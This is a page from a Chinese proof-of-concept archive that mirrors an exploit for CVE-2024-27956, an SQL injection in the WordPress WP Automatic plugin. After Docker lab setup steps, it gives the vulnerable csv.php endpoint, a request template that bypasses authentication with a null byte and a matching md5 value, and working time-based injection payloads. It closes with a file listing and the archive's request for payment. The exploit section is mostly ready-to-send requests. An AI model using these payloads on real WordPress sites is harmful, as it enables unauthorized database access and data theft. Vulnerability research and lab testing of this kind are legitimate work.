POC详情: f4f42742e48c1c5b47c8adfe35ed4a601d32d1be

来源
关联漏洞
标题: WordPress Plugin WP Automatic SQL注入漏洞 (CVE-2024-27956)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress Plugin WP Automatic 存在SQL注入漏洞,该漏洞源于存在 SQL 注入漏洞。
介绍
# CVE-2024-27956
Note

Build wordpress: docker-compose -f stack.yml up

Install plugin:
1. WordPress dashboard, choose Plugins > Add New

2. Click Upload Plugin

![image](https://github.com/truonghuuphuc/CVE-2024-27956/assets/20487674/39c596dd-bb5c-457f-87e8-b811a1cd0f12)

3. Choose File -> wp-automatic.zip ->  Install Now

![image](https://github.com/truonghuuphuc/CVE-2024-27956/assets/20487674/13880686-b083-458b-975d-2cab35c11fc0)

4. After the installation is complete, click Activate Plugin

![image](https://github.com/truonghuuphuc/CVE-2024-27956/assets/20487674/ecfc78d1-7a43-4ca1-88a0-d6e9db875e60)

Exploit

```<HOST>/wp-content/plugins/wp-automatic/inc/csv.php```

```q={{query}}&auth=%00&integ={{md5query}}```
```
q=SELECT+IF(1=1,sleep(5),sleep(0))&auth=%00&integ=93cf9aa11e746596d6f31765a7222c9f
```
![image](https://github.com/truonghuuphuc/CVE-2024-27956/assets/20487674/f480537c-5961-4f15-9671-0cc4bf4afd8a)
```
q=SELECT+IF(1=2,sleep(5),sleep(0))&auth=%00&integ=4b1f4024af81df56c3b00679b9b52183
```
![image](https://github.com/truonghuuphuc/CVE-2024-27956/assets/20487674/7311aa48-9c2b-43a9-a858-6488badff071)
文件快照

[4.0K] /data/pocs/f4f42742e48c1c5b47c8adfe35ed4a601d32d1be ├── [1.1K] README.md ├── [ 607] stack.yml └── [1.0M] wp-automatic.zip 0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。